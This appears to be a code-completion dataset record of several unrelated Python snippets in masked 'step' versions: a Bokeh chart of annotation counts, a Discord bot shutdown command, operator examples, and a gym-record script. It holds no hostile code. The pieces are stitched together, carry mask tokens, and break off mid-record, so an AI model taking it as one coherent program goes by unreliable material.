"step-1": "<mask token>\n\n\ndef read_summary(summary_file):\n return json.loads(open(summary_file, 'r').read())\n\n\ndef get_descriptions(summary):\n d = {}\n for o in summary['ontology_events']:\n print(o)\n d[o] = summary['ontology_events'][o].get('description', summary[\n 'ontology_events'][o]['method']) + '_' + str(o)\n return d\n\n\ndef plot_totals(summary):\n descriptions = get_descriptions(summary)\n totals = {}\n for event in summary['ontology_events'].keys():\n totals[str(event)] = {'genes': [], 'rxns': [], 'terms': []}\n for gene in summary['genes']:\n for term in summary['genes'][gene]['terms']:\n for event in summary['genes'][gene]['terms'][term]:\n totals[str(event)]['genes'].append(gene)\n for term in summary['terms']:\n for event in summary['terms'][term]:\n totals[str(event)]['terms'].append(term)\n for rxn in summary['rxns']:\n for event in summary['rxns'][rxn]:\n totals[str(event)]['rxns'].append(rxn)\n events = []\n types = ['genes', 'terms', 'rxns']\n gene_counts = []\n rxn_counts = []\n term_counts = []\n for event in totals:\n events.append(descriptions[event])\n gene_counts.append(len(set(totals[event]['genes'])))\n rxn_counts.append(len(set(totals[event]['rxns'])))\n term_counts.append(len(set(totals[event]['terms'])))\n data = {'events': events, 'genes': gene_counts, 'terms': term_counts,\n 'rxns': rxn_counts}\n x = [(event, type) for event in events for type in types]\n counts = sum(zip(data['genes'], data['terms'], data['rxns']), ())\n source = ColumnDataSource(data=dict(x=x, counts=counts))\n p = figure(y_range=FactorRange(*x), plot_height=400, plot_width=1000,\n title='Unique Counts per Annotation Event', tools=\n 'wheel_zoom,box_zoom,reset,save')\n p.hbar(y='x', right='counts', height=0.9, source=source, line_color=\n 'black', fill_color=factor_cmap('x', palette=inferno(len(types)),\n factors=types, start=1, end=2))\n p.x_range.start = 0\n p.y_range.range_padding = 0.1\n p.yaxis.major_label_orientation = 'horizontal'\n 
p.yaxis.subgroup_label_orientation = 'horizontal'\n p.yaxis.group_label_orientation = 'horizontal'\n p.ygrid.grid_line_color = None\n p.title.text_font_size = '12pt'\n p.xaxis.major_label_text_font_size = '12pt'\n p.yaxis.major_label_text_font_size = '12pt'\n p.yaxis.group_text_font_size = '12pt'\n p.add_tools(HoverTool(tooltips=[('Type', '@x'), ('Count', '@counts')]))\n return p\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef read_summary(summary_file):\n return json.loads(open(summary_file, 'r').read())\n\n\ndef get_descriptions(summary):\n d = {}\n for o in summary['ontology_events']:\n print(o)\n d[o] = summary['ontology_events'][o].get('description', summary[\n 'ontology_events'][o]['method']) + '_' + str(o)\n return d\n\n\ndef plot_totals(summary):\n descriptions = get_descriptions(summary)\n totals = {}\n for event in summary['ontology_events'].keys():\n totals[str(event)] = {'genes': [], 'rxns': [], 'terms': []}\n for gene in summary['genes']:\n for term in summary['genes'][gene]['terms']:\n for event in summary['genes'][gene]['terms'][term]:\n totals[str(event)]['genes'].append(gene)\n for term in summary['terms']:\n for event in summary['terms'][term]:\n totals[str(event)]['terms'].append(term)\n for rxn in summary['rxns']:\n for event in summary['rxns'][rxn]:\n totals[str(event)]['rxns'].append(rxn)\n events = []\n types = ['genes', 'terms', 'rxns']\n gene_counts = []\n rxn_counts = []\n term_counts = []\n for event in totals:\n events.append(descriptions[event])\n gene_counts.append(len(set(totals[event]['genes'])))\n rxn_counts.append(len(set(totals[event]['rxns'])))\n term_counts.append(len(set(totals[event]['terms'])))\n data = {'events': events, 'genes': gene_counts, 'terms': term_counts,\n 'rxns': rxn_counts}\n x = [(event, type) for event in events for type in types]\n counts = sum(zip(data['genes'], data['terms'], data['rxns']), ())\n source = ColumnDataSource(data=dict(x=x, counts=counts))\n p = figure(y_range=FactorRange(*x), plot_height=400, plot_width=1000,\n title='Unique Counts per Annotation Event', tools=\n 'wheel_zoom,box_zoom,reset,save')\n p.hbar(y='x', right='counts', height=0.9, source=source, line_color=\n 'black', fill_color=factor_cmap('x', palette=inferno(len(types)),\n factors=types, start=1, end=2))\n p.x_range.start = 0\n p.y_range.range_padding = 0.1\n p.yaxis.major_label_orientation = 'horizontal'\n 
p.yaxis.subgroup_label_orientation = 'horizontal'\n p.yaxis.group_label_orientation = 'horizontal'\n p.ygrid.grid_line_color = None\n p.title.text_font_size = '12pt'\n p.xaxis.major_label_text_font_size = '12pt'\n p.yaxis.major_label_text_font_size = '12pt'\n p.yaxis.group_text_font_size = '12pt'\n p.add_tools(HoverTool(tooltips=[('Type', '@x'), ('Count', '@counts')]))\n return p\n\n\n<mask token>\noutput_file('totals.html', title='Totals')\n<mask token>\nshow(totals)\n",
"step-3": "<mask token>\n\n\ndef read_summary(summary_file):\n return json.loads(open(summary_file, 'r').read())\n\n\ndef get_descriptions(summary):\n d = {}\n for o in summary['ontology_events']:\n print(o)\n d[o] = summary['ontology_events'][o].get('description', summary[\n 'ontology_events'][o]['method']) + '_' + str(o)\n return d\n\n\ndef plot_totals(summary):\n descriptions = get_descriptions(summary)\n totals = {}\n for event in summary['ontology_events'].keys():\n totals[str(event)] = {'genes': [], 'rxns': [], 'terms': []}\n for gene in summary['genes']:\n for term in summary['genes'][gene]['terms']:\n for event in summary['genes'][gene]['terms'][term]:\n totals[str(event)]['genes'].append(gene)\n for term in summary['terms']:\n for event in summary['terms'][term]:\n totals[str(event)]['terms'].append(term)\n for rxn in summary['rxns']:\n for event in summary['rxns'][rxn]:\n totals[str(event)]['rxns'].append(rxn)\n events = []\n types = ['genes', 'terms', 'rxns']\n gene_counts = []\n rxn_counts = []\n term_counts = []\n for event in totals:\n events.append(descriptions[event])\n gene_counts.append(len(set(totals[event]['genes'])))\n rxn_counts.append(len(set(totals[event]['rxns'])))\n term_counts.append(len(set(totals[event]['terms'])))\n data = {'events': events, 'genes': gene_counts, 'terms': term_counts,\n 'rxns': rxn_counts}\n x = [(event, type) for event in events for type in types]\n counts = sum(zip(data['genes'], data['terms'], data['rxns']), ())\n source = ColumnDataSource(data=dict(x=x, counts=counts))\n p = figure(y_range=FactorRange(*x), plot_height=400, plot_width=1000,\n title='Unique Counts per Annotation Event', tools=\n 'wheel_zoom,box_zoom,reset,save')\n p.hbar(y='x', right='counts', height=0.9, source=source, line_color=\n 'black', fill_color=factor_cmap('x', palette=inferno(len(types)),\n factors=types, start=1, end=2))\n p.x_range.start = 0\n p.y_range.range_padding = 0.1\n p.yaxis.major_label_orientation = 'horizontal'\n 
p.yaxis.subgroup_label_orientation = 'horizontal'\n p.yaxis.group_label_orientation = 'horizontal'\n p.ygrid.grid_line_color = None\n p.title.text_font_size = '12pt'\n p.xaxis.major_label_text_font_size = '12pt'\n p.yaxis.major_label_text_font_size = '12pt'\n p.yaxis.group_text_font_size = '12pt'\n p.add_tools(HoverTool(tooltips=[('Type', '@x'), ('Count', '@counts')]))\n return p\n\n\nsummary = read_summary('PT19DW.7.json')\noutput_file('totals.html', title='Totals')\ntotals = plot_totals(summary)\nshow(totals)\n",
"step-4": "import json\nfrom bokeh.plotting import figure, output_file\nfrom bokeh.io import show\nfrom bokeh.palettes import inferno\nfrom bokeh.models import ColumnDataSource, FactorRange\nfrom bokeh.transform import factor_cmap\nfrom bokeh.models import HoverTool\n\n\ndef read_summary(summary_file):\n return json.loads(open(summary_file, 'r').read())\n\n\ndef get_descriptions(summary):\n d = {}\n for o in summary['ontology_events']:\n print(o)\n d[o] = summary['ontology_events'][o].get('description', summary[\n 'ontology_events'][o]['method']) + '_' + str(o)\n return d\n\n\ndef plot_totals(summary):\n descriptions = get_descriptions(summary)\n totals = {}\n for event in summary['ontology_events'].keys():\n totals[str(event)] = {'genes': [], 'rxns': [], 'terms': []}\n for gene in summary['genes']:\n for term in summary['genes'][gene]['terms']:\n for event in summary['genes'][gene]['terms'][term]:\n totals[str(event)]['genes'].append(gene)\n for term in summary['terms']:\n for event in summary['terms'][term]:\n totals[str(event)]['terms'].append(term)\n for rxn in summary['rxns']:\n for event in summary['rxns'][rxn]:\n totals[str(event)]['rxns'].append(rxn)\n events = []\n types = ['genes', 'terms', 'rxns']\n gene_counts = []\n rxn_counts = []\n term_counts = []\n for event in totals:\n events.append(descriptions[event])\n gene_counts.append(len(set(totals[event]['genes'])))\n rxn_counts.append(len(set(totals[event]['rxns'])))\n term_counts.append(len(set(totals[event]['terms'])))\n data = {'events': events, 'genes': gene_counts, 'terms': term_counts,\n 'rxns': rxn_counts}\n x = [(event, type) for event in events for type in types]\n counts = sum(zip(data['genes'], data['terms'], data['rxns']), ())\n source = ColumnDataSource(data=dict(x=x, counts=counts))\n p = figure(y_range=FactorRange(*x), plot_height=400, plot_width=1000,\n title='Unique Counts per Annotation Event', tools=\n 'wheel_zoom,box_zoom,reset,save')\n p.hbar(y='x', right='counts', height=0.9, 
source=source, line_color=\n 'black', fill_color=factor_cmap('x', palette=inferno(len(types)),\n factors=types, start=1, end=2))\n p.x_range.start = 0\n p.y_range.range_padding = 0.1\n p.yaxis.major_label_orientation = 'horizontal'\n p.yaxis.subgroup_label_orientation = 'horizontal'\n p.yaxis.group_label_orientation = 'horizontal'\n p.ygrid.grid_line_color = None\n p.title.text_font_size = '12pt'\n p.xaxis.major_label_text_font_size = '12pt'\n p.yaxis.major_label_text_font_size = '12pt'\n p.yaxis.group_text_font_size = '12pt'\n p.add_tools(HoverTool(tooltips=[('Type', '@x'), ('Count', '@counts')]))\n return p\n\n\nsummary = read_summary('PT19DW.7.json')\noutput_file('totals.html', title='Totals')\ntotals = plot_totals(summary)\nshow(totals)\n",
"step-5": "import json\n\nfrom bokeh.plotting import figure, output_file\nfrom bokeh.io import show\nfrom bokeh.palettes import inferno\nfrom bokeh.models import ColumnDataSource, FactorRange\nfrom bokeh.transform import factor_cmap\nfrom bokeh.models import HoverTool\n# from bokeh.io import export_svgs\n\n\ndef read_summary(summary_file):\n return json.loads(open(summary_file, \"r\").read())\n\n\ndef get_descriptions(summary):\n d = {}\n for o in summary[\"ontology_events\"]:\n print(o)\n d[o] = summary[\"ontology_events\"][o].get(\n 'description', summary[\"ontology_events\"][o]['method']) + '_' + str(o)\n return(d)\n\n\ndef plot_totals(summary):\n descriptions = get_descriptions(summary)\n totals = {}\n for event in summary['ontology_events'].keys():\n totals[str(event)] = {'genes': [],\n 'rxns': [],\n 'terms': []}\n\n # genes\n for gene in summary['genes']:\n for term in summary['genes'][gene]['terms']:\n for event in summary['genes'][gene]['terms'][term]:\n totals[str(event)]['genes'].append(gene)\n\n # terms\n for term in summary['terms']:\n for event in summary['terms'][term]:\n totals[str(event)]['terms'].append(term)\n\n # rxns\n for rxn in summary['rxns']:\n for event in summary['rxns'][rxn]:\n totals[str(event)]['rxns'].append(rxn)\n\n # sums\n events = []\n types = ['genes', 'terms', 'rxns']\n\n gene_counts = []\n rxn_counts = []\n term_counts = []\n\n for event in totals:\n events.append(descriptions[event])\n gene_counts.append(len(set(totals[event]['genes'])))\n rxn_counts.append(len(set(totals[event]['rxns'])))\n term_counts.append(len(set(totals[event]['terms'])))\n\n data = {'events': events,\n 'genes': gene_counts,\n 'terms': term_counts,\n 'rxns': rxn_counts\n }\n\n x = [(event, type) for event in events for type in types]\n\n counts = sum(zip(data['genes'], data['terms'], data['rxns']), ())\n source = ColumnDataSource(data=dict(x=x, counts=counts))\n\n p = figure(y_range=FactorRange(*x),\n plot_height=400,\n plot_width=1000,\n title=\"Unique 
Counts per Annotation Event\",\n tools=\"wheel_zoom,box_zoom,reset,save\")\n\n p.hbar(y='x',\n right='counts',\n height=0.9,\n source=source,\n line_color=\"black\",\n fill_color=factor_cmap('x',\n palette=inferno(len(types)),\n factors=types,\n start=1,\n end=2))\n\n p.x_range.start = 0\n p.y_range.range_padding = 0.1\n p.yaxis.major_label_orientation = \"horizontal\"\n p.yaxis.subgroup_label_orientation = \"horizontal\"\n p.yaxis.group_label_orientation = \"horizontal\"\n p.ygrid.grid_line_color = None\n p.title.text_font_size = '12pt'\n p.xaxis.major_label_text_font_size = \"12pt\"\n p.yaxis.major_label_text_font_size = \"12pt\"\n p.yaxis.group_text_font_size = \"12pt\"\n p.add_tools(HoverTool(tooltips=[(\"Type\", \"@x\"), (\"Count\", \"@counts\")]))\n\n return(p)\n\n\n#summary = read_summary(\"PT19DW.5.json\")\nsummary = read_summary(\"PT19DW.7.json\")\n\noutput_file(\"totals.html\", title=\"Totals\")\ntotals = plot_totals(summary)\n\nshow(totals)\n",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
<|reserved_special_token_0|>
class Staff(commands.Cog):
<|reserved_special_token_0|>
@commands.command(name='stop', aliases=['shutdown'], description=
'This is a command for staff only to stop the bot')
@is_owner()
async def stop_bot(self, ctx):
"""Shutdown the bot"""
await ctx.send("Oh, alright... I'll just shutup I guess.. :wave:")
await self.bot.close()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Staff(commands.Cog):
def __init__(self, bot):
self.bot = bot
@commands.command(name='stop', aliases=['shutdown'], description=
'This is a command for staff only to stop the bot')
@is_owner()
async def stop_bot(self, ctx):
"""Shutdown the bot"""
await ctx.send("Oh, alright... I'll just shutup I guess.. :wave:")
await self.bot.close()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def is_owner():
async def predicate(ctx):
return ctx.author.id == 98208218022428672
return commands.check(predicate)
class Staff(commands.Cog):
def __init__(self, bot):
self.bot = bot
@commands.command(name='stop', aliases=['shutdown'], description=
'This is a command for staff only to stop the bot')
@is_owner()
async def stop_bot(self, ctx):
"""Shutdown the bot"""
await ctx.send("Oh, alright... I'll just shutup I guess.. :wave:")
await self.bot.close()
<|reserved_special_token_1|>
from discord.ext import commands
def is_owner():
async def predicate(ctx):
return ctx.author.id == 98208218022428672
return commands.check(predicate)
class Staff(commands.Cog):
def __init__(self, bot):
self.bot = bot
@commands.command(name='stop', aliases=['shutdown'], description=
'This is a command for staff only to stop the bot')
@is_owner()
async def stop_bot(self, ctx):
"""Shutdown the bot"""
await ctx.send("Oh, alright... I'll just shutup I guess.. :wave:")
await self.bot.close()
<|reserved_special_token_1|>
from discord.ext import commands
def is_owner():
async def predicate(ctx):
return ctx.author.id == 98208218022428672
return commands.check(predicate)
class Staff(commands.Cog):
def __init__(self, bot):
self.bot = bot
@commands.command(
name='stop',
aliases=['shutdown'],
description='This is a command for staff only to stop the bot'
)
@is_owner()
async def stop_bot(self, ctx):
"""Shutdown the bot"""
await ctx.send('Oh, alright... I\'ll just shutup I guess.. :wave:')
await self.bot.close()
|
flexible
|
{
"blob_id": "23b2cc5b561a11ae7757a281a141491d5b7e23ca",
"index": 2683,
"step-1": "<mask token>\n\n\nclass Staff(commands.Cog):\n <mask token>\n\n @commands.command(name='stop', aliases=['shutdown'], description=\n 'This is a command for staff only to stop the bot')\n @is_owner()\n async def stop_bot(self, ctx):\n \"\"\"Shutdown the bot\"\"\"\n await ctx.send(\"Oh, alright... I'll just shutup I guess.. :wave:\")\n await self.bot.close()\n",
"step-2": "<mask token>\n\n\nclass Staff(commands.Cog):\n\n def __init__(self, bot):\n self.bot = bot\n\n @commands.command(name='stop', aliases=['shutdown'], description=\n 'This is a command for staff only to stop the bot')\n @is_owner()\n async def stop_bot(self, ctx):\n \"\"\"Shutdown the bot\"\"\"\n await ctx.send(\"Oh, alright... I'll just shutup I guess.. :wave:\")\n await self.bot.close()\n",
"step-3": "<mask token>\n\n\ndef is_owner():\n\n async def predicate(ctx):\n return ctx.author.id == 98208218022428672\n return commands.check(predicate)\n\n\nclass Staff(commands.Cog):\n\n def __init__(self, bot):\n self.bot = bot\n\n @commands.command(name='stop', aliases=['shutdown'], description=\n 'This is a command for staff only to stop the bot')\n @is_owner()\n async def stop_bot(self, ctx):\n \"\"\"Shutdown the bot\"\"\"\n await ctx.send(\"Oh, alright... I'll just shutup I guess.. :wave:\")\n await self.bot.close()\n",
"step-4": "from discord.ext import commands\n\n\ndef is_owner():\n\n async def predicate(ctx):\n return ctx.author.id == 98208218022428672\n return commands.check(predicate)\n\n\nclass Staff(commands.Cog):\n\n def __init__(self, bot):\n self.bot = bot\n\n @commands.command(name='stop', aliases=['shutdown'], description=\n 'This is a command for staff only to stop the bot')\n @is_owner()\n async def stop_bot(self, ctx):\n \"\"\"Shutdown the bot\"\"\"\n await ctx.send(\"Oh, alright... I'll just shutup I guess.. :wave:\")\n await self.bot.close()\n",
"step-5": "from discord.ext import commands\n\n\ndef is_owner():\n async def predicate(ctx):\n return ctx.author.id == 98208218022428672\n\n return commands.check(predicate)\n\n\nclass Staff(commands.Cog):\n def __init__(self, bot):\n self.bot = bot\n\n @commands.command(\n name='stop',\n aliases=['shutdown'],\n description='This is a command for staff only to stop the bot'\n )\n @is_owner()\n async def stop_bot(self, ctx):\n \"\"\"Shutdown the bot\"\"\"\n await ctx.send('Oh, alright... I\\'ll just shutup I guess.. :wave:')\n await self.bot.close()\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
print(a)
<|reserved_special_token_0|>
print(b)
<|reserved_special_token_0|>
print(c)
print(19 - 1)
<|reserved_special_token_0|>
print(d)
<|reserved_special_token_0|>
print(e)
<|reserved_special_token_0|>
print(f)
<|reserved_special_token_0|>
print(g)
<|reserved_special_token_0|>
print(h)
<|reserved_special_token_1|>
a = 7 + 8
print(a)
b = 'GOOD' + 'Job'
print(b)
c = -7
print(c)
print(19 - 1)
d = 4 * 7
print(d)
e = 'hello' * 7
print(e)
f = 7 / 2
print(f)
g = 2 ** 3
print(g)
h = 3 < 7
print(h)
<|reserved_special_token_1|>
#python的运算符实例
#'+'加号
# 俩个对象相加(可以是俩个数字,也可以是俩个字符串(将俩个字符串连接))
a=7+8
print(a)
b="GOOD"+"Job"
print(b)
#'-'减号
#取一个数字的相反数或者实现俩个数字相减
c=-7
print(c)
print(19-1)
#'*'乘号
#如果是数字则进行乘法运算,字符串则复制若干次
d=4*7
print(d)
e="hello"*7
print(e)
#'/'除号
#表示俩个数字相除(Python 3.0中会直接输出正确的值)
f=7/2
print(f)
#'**'求幂运算
g=2**3
print(g)
#'<'小于号 返回一个布尔值
h=3<7
print(h)
|
flexible
|
{
"blob_id": "d28f5f95b375a1e075fdfcbc0350c90cf96f0212",
"index": 9694,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint(a)\n<mask token>\nprint(b)\n<mask token>\nprint(c)\nprint(19 - 1)\n<mask token>\nprint(d)\n<mask token>\nprint(e)\n<mask token>\nprint(f)\n<mask token>\nprint(g)\n<mask token>\nprint(h)\n",
"step-3": "a = 7 + 8\nprint(a)\nb = 'GOOD' + 'Job'\nprint(b)\nc = -7\nprint(c)\nprint(19 - 1)\nd = 4 * 7\nprint(d)\ne = 'hello' * 7\nprint(e)\nf = 7 / 2\nprint(f)\ng = 2 ** 3\nprint(g)\nh = 3 < 7\nprint(h)\n",
"step-4": "#python的运算符实例\n#'+'加号\n# 俩个对象相加(可以是俩个数字,也可以是俩个字符串(将俩个字符串连接))\na=7+8\nprint(a)\nb=\"GOOD\"+\"Job\"\nprint(b)\n\n#'-'减号\n#取一个数字的相反数或者实现俩个数字相减\nc=-7\nprint(c)\nprint(19-1)\n\n#'*'乘号\n#如果是数字则进行乘法运算,字符串则复制若干次\nd=4*7\nprint(d)\ne=\"hello\"*7\nprint(e)\n\n#'/'除号\n#表示俩个数字相除(Python 3.0中会直接输出正确的值)\nf=7/2\nprint(f)\n\n#'**'求幂运算\ng=2**3\nprint(g)\n\n#'<'小于号 返回一个布尔值\nh=3<7\nprint(h)\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def increment(number):
number += 1
return number
<|reserved_special_token_0|>
<|reserved_special_token_1|>
x = 10
def increment(number):
number += 1
return number
x = increment(x)
<|reserved_special_token_1|>
# x = 10
#
# def increment():
# x += 1
#
# ^^ Non-working code
x = 10
def increment(number):
number += 1
return number
# If we want to change a global variable,
# we have to do it like this
x = increment(x)
|
flexible
|
{
"blob_id": "a0460b100a750b685f3e831a19379b0e26da4b35",
"index": 7368,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef increment(number):\n number += 1\n return number\n\n\n<mask token>\n",
"step-3": "x = 10\n\n\ndef increment(number):\n number += 1\n return number\n\n\nx = increment(x)\n",
"step-4": "# x = 10\n#\n# def increment():\n# x += 1\n# \n# ^^ Non-working code\n\nx = 10\n\ndef increment(number): \n number += 1\n return number\n\n# If we want to change a global variable,\n# we have to do it like this\nx = increment(x)",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
while True:
print(
""" Welcome to HMS
1. Are you want enter data
2. Are you want see record
3. exit
"""
)
option = int(input('enter your option'))
print(option)
if option == 1:
print(
""" Select client name
1. Add Exercise
2. Add Dite
4. exit
"""
)
option1 = int(input('enter your option'))
if option1 == 1:
print(
""" 1. Aditya
2. harsh
3. shivam
4. exit
"""
)
list = ['Aditya', 'harsh', 'shivam']
option2 = int(input('enter your option'))
option2 = option2 - 1
name = list[option2]
dec = input('enter the exercise name')
f = open(name, 'a')
decs = dec + '--' + str(a) + '\n'
f.write(decs)
f.close()
print('successfuly data enter')
elif option1 == 2:
print(
""" 1. Aditya
2. harsh
3. shivam
4. exit
"""
)
list = ['Aditya', 'harsh', 'shivam']
option2 = int(input('enter your option'))
option2 = option2 - 1
name = list[option2]
dec = input('enter the dite')
f = open(name, 'a')
decs = dec + '--' + str(a) + '\n'
f.write(decs)
f.close()
print('successfuly data enter')
else:
break
elif option == 2:
print(
""" select name whose record you want see
1. Aditya
2. harsh
3. shivam
4. exit
"""
)
list = ['Aditya', 'harsh', 'shivam']
option3 = int(input('enter your option'))
option3 = option3 - 1
name = list[option3]
f = open(name, 'rt')
content = f.read()
print(content)
else:
break
<|reserved_special_token_1|>
<|reserved_special_token_0|>
a = datetime.datetime.now()
while True:
print(
""" Welcome to HMS
1. Are you want enter data
2. Are you want see record
3. exit
"""
)
option = int(input('enter your option'))
print(option)
if option == 1:
print(
""" Select client name
1. Add Exercise
2. Add Dite
4. exit
"""
)
option1 = int(input('enter your option'))
if option1 == 1:
print(
""" 1. Aditya
2. harsh
3. shivam
4. exit
"""
)
list = ['Aditya', 'harsh', 'shivam']
option2 = int(input('enter your option'))
option2 = option2 - 1
name = list[option2]
dec = input('enter the exercise name')
f = open(name, 'a')
decs = dec + '--' + str(a) + '\n'
f.write(decs)
f.close()
print('successfuly data enter')
elif option1 == 2:
print(
""" 1. Aditya
2. harsh
3. shivam
4. exit
"""
)
list = ['Aditya', 'harsh', 'shivam']
option2 = int(input('enter your option'))
option2 = option2 - 1
name = list[option2]
dec = input('enter the dite')
f = open(name, 'a')
decs = dec + '--' + str(a) + '\n'
f.write(decs)
f.close()
print('successfuly data enter')
else:
break
elif option == 2:
print(
""" select name whose record you want see
1. Aditya
2. harsh
3. shivam
4. exit
"""
)
list = ['Aditya', 'harsh', 'shivam']
option3 = int(input('enter your option'))
option3 = option3 - 1
name = list[option3]
f = open(name, 'rt')
content = f.read()
print(content)
else:
break
<|reserved_special_token_1|>
import datetime
a = datetime.datetime.now()
while True:
print(
""" Welcome to HMS
1. Are you want enter data
2. Are you want see record
3. exit
"""
)
option = int(input('enter your option'))
print(option)
if option == 1:
print(
""" Select client name
1. Add Exercise
2. Add Dite
4. exit
"""
)
option1 = int(input('enter your option'))
if option1 == 1:
print(
""" 1. Aditya
2. harsh
3. shivam
4. exit
"""
)
list = ['Aditya', 'harsh', 'shivam']
option2 = int(input('enter your option'))
option2 = option2 - 1
name = list[option2]
dec = input('enter the exercise name')
f = open(name, 'a')
decs = dec + '--' + str(a) + '\n'
f.write(decs)
f.close()
print('successfuly data enter')
elif option1 == 2:
print(
""" 1. Aditya
2. harsh
3. shivam
4. exit
"""
)
list = ['Aditya', 'harsh', 'shivam']
option2 = int(input('enter your option'))
option2 = option2 - 1
name = list[option2]
dec = input('enter the dite')
f = open(name, 'a')
decs = dec + '--' + str(a) + '\n'
f.write(decs)
f.close()
print('successfuly data enter')
else:
break
elif option == 2:
print(
""" select name whose record you want see
1. Aditya
2. harsh
3. shivam
4. exit
"""
)
list = ['Aditya', 'harsh', 'shivam']
option3 = int(input('enter your option'))
option3 = option3 - 1
name = list[option3]
f = open(name, 'rt')
content = f.read()
print(content)
else:
break
<|reserved_special_token_1|>
import datetime
a = datetime.datetime.now()
while True:
print("""\
Welcome to HMS
1. Are you want enter data
2. Are you want see record
3. exit
""")
option = int(input("enter your option"))
print(option)
if option == 1:
print("""\
Select client name
1. Add Exercise
2. Add Dite
4. exit
""")
option1 =int(input("enter your option"))
if option1 == 1:
print("""\
1. Aditya
2. harsh
3. shivam
4. exit
""")
list=['Aditya', 'harsh','shivam']
option2 =int(input("enter your option"))
option2 = option2-1
name = list[option2]
dec = input("enter the exercise name")
f = open(name,"a")
decs = dec+'--'+str(a)+'\n'
f.write(decs)
f.close()
print('successfuly data enter')
elif option1 == 2:
print("""\
1. Aditya
2. harsh
3. shivam
4. exit
""")
list=['Aditya', 'harsh','shivam']
option2 =int(input("enter your option"))
option2 = option2-1
name = list[option2]
dec = input("enter the dite")
f = open(name,"a")
decs = dec+'--'+str(a)+'\n'
f.write(decs)
f.close()
print('successfuly data enter')
else:
break
elif option == 2:
print("""\
select name whose record you want see
1. Aditya
2. harsh
3. shivam
4. exit
""")
list=['Aditya', 'harsh','shivam']
option3 =int(input("enter your option"))
option3 = option3-1
name = list[option3]
f = open(name,"rt")
content =f.read()
print(content)
else:
break
|
flexible
|
{
"blob_id": "5c5a0fd67a6d6e805b77ddfddfe959335daa3bad",
"index": 6383,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nwhile True:\n print(\n \"\"\" Welcome to HMS\n 1. Are you want enter data\n 2. Are you want see record\n 3. exit\n \"\"\"\n )\n option = int(input('enter your option'))\n print(option)\n if option == 1:\n print(\n \"\"\" Select client name\n 1. Add Exercise\n 2. Add Dite\n 4. exit\n \"\"\"\n )\n option1 = int(input('enter your option'))\n if option1 == 1:\n print(\n \"\"\" 1. Aditya\n 2. harsh\n 3. shivam\n 4. exit\n \"\"\"\n )\n list = ['Aditya', 'harsh', 'shivam']\n option2 = int(input('enter your option'))\n option2 = option2 - 1\n name = list[option2]\n dec = input('enter the exercise name')\n f = open(name, 'a')\n decs = dec + '--' + str(a) + '\\n'\n f.write(decs)\n f.close()\n print('successfuly data enter')\n elif option1 == 2:\n print(\n \"\"\" 1. Aditya\n 2. harsh\n 3. shivam\n 4. exit\n \"\"\"\n )\n list = ['Aditya', 'harsh', 'shivam']\n option2 = int(input('enter your option'))\n option2 = option2 - 1\n name = list[option2]\n dec = input('enter the dite')\n f = open(name, 'a')\n decs = dec + '--' + str(a) + '\\n'\n f.write(decs)\n f.close()\n print('successfuly data enter')\n else:\n break\n elif option == 2:\n print(\n \"\"\" select name whose record you want see\n 1. Aditya\n 2. harsh\n 3. shivam\n 4. exit\n \"\"\"\n )\n list = ['Aditya', 'harsh', 'shivam']\n option3 = int(input('enter your option'))\n option3 = option3 - 1\n name = list[option3]\n f = open(name, 'rt')\n content = f.read()\n print(content)\n else:\n break\n",
"step-3": "<mask token>\na = datetime.datetime.now()\nwhile True:\n print(\n \"\"\" Welcome to HMS\n 1. Are you want enter data\n 2. Are you want see record\n 3. exit\n \"\"\"\n )\n option = int(input('enter your option'))\n print(option)\n if option == 1:\n print(\n \"\"\" Select client name\n 1. Add Exercise\n 2. Add Dite\n 4. exit\n \"\"\"\n )\n option1 = int(input('enter your option'))\n if option1 == 1:\n print(\n \"\"\" 1. Aditya\n 2. harsh\n 3. shivam\n 4. exit\n \"\"\"\n )\n list = ['Aditya', 'harsh', 'shivam']\n option2 = int(input('enter your option'))\n option2 = option2 - 1\n name = list[option2]\n dec = input('enter the exercise name')\n f = open(name, 'a')\n decs = dec + '--' + str(a) + '\\n'\n f.write(decs)\n f.close()\n print('successfuly data enter')\n elif option1 == 2:\n print(\n \"\"\" 1. Aditya\n 2. harsh\n 3. shivam\n 4. exit\n \"\"\"\n )\n list = ['Aditya', 'harsh', 'shivam']\n option2 = int(input('enter your option'))\n option2 = option2 - 1\n name = list[option2]\n dec = input('enter the dite')\n f = open(name, 'a')\n decs = dec + '--' + str(a) + '\\n'\n f.write(decs)\n f.close()\n print('successfuly data enter')\n else:\n break\n elif option == 2:\n print(\n \"\"\" select name whose record you want see\n 1. Aditya\n 2. harsh\n 3. shivam\n 4. exit\n \"\"\"\n )\n list = ['Aditya', 'harsh', 'shivam']\n option3 = int(input('enter your option'))\n option3 = option3 - 1\n name = list[option3]\n f = open(name, 'rt')\n content = f.read()\n print(content)\n else:\n break\n",
